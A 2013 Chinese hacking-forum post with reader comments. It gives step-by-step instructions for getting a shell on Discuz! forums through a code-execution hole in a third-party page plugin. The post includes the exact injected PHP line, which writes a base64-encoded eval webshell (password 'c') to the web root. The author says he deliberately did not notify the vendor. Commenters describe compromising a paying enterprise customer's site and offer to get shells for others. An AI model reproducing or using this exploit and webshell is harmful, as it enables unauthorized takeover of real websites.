Discuz! 多个版本 后台拿shell，需有安装APP权限

具体哪些版本存在漏洞，自己测试，只要能安装这个插件的，就能拿到shell，这个已经在手里 很久了，但是使用其拿shell,也没几次，没事写出来，大家乐乐，别忘记感谢。

这个方法，就是需要 zend 支持【插件zend加密】，当然我还有一个不需要ZEND支持的，都是 app第三方的插件问题。

下面我来说说过程吧！

1.安装 zend 权限检查插件，因为后面利用到的插件是zend加密的，只要装了这个插件，后面的插件才能正常安装！

http://addon.discuz.com/?@study_zendcheck.pack

2.安装雨哲关于我们单页插件。 【[i][/i]ps：雨哲的好几个插件都有这个代码执行漏洞，自己发掘～！】

3.页面管理，随便编辑一个页面，注意到了吧，没错，任意代码执行，下面我们就让生成一个小马

我插入：

fputs(fopen('88.php',w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="));

然后我提交！

4.保存好后，我们点预览刚才编辑的页面，如图：

5.来看看我们的成果，会在根目录下面生成：88.php 密码为：c

无图无真相，翠花上图：

本来想先通知厂家的，厂家一下下架了，大家就没得玩了，所以就放在技术社区里面，大家觉得能用上，也点 感谢 下。

还有一个不需要 zend权限的插件，能直接上传任何后缀名的文件，看感谢情况而定，是否发出。

还有 Discuz!NT 高版本 rss.aspx 不能编辑的情况下，进入后台后 拿shell 的办法。这次就不说了！

[原文地址]

相关讨论：

11#

木易耳朵 | 2013-07-21 00:23

安装插件需要有安全码啊。不通用。即使你的账户是创始人，没有安全码你也不能安装插件。

12#

江南的鱼 | 2013-07-21 00:36

自己有没测试，安全码是在论坛端还是在插件端设置的？为毛我试了好多都没要安全码？我本地下载安装也没有安全码，如果是在dz官方插件注册用户绑定了域名，这个域名对应一个帐号，而没绑定域名的可以不要安全码安装，我想改下host文件就绕过了，当然要看这个安全码是哪个了，请说明安全码是哪来的，怎么设置的，才能想到绕过的办法

14#

木易耳朵 | 2013-07-21 08:45

@江南的鱼 我日的一个企业大客户版，就是官方报价几十万的那种。安装插件是要确认安全码的。这个安全码可以重设，但是要在网站目录上传一个txt验证文件后才可以重新设置。

16#

苦战 | 2013-07-21 10:05

不通用 安全码是硬伤 不解释

17#

debug | 2013-07-21 10:47

哈哈 还有几个插件也是。。。 拿着很久了

18#

江南的鱼 | 2013-07-21 11:01

@木易耳朵 如果需要，可以联系我帮你拿shell

20#

Yaseng (看黄片 到 www.yaseng.me) | 2013-07-21 13:51

我会说 可以自己提交带后门的插件玩玩

留言评论（旧系统）：

文章来源于lcx.cc:Discuz! 多个版本 后台拿shell，需有安装APP权限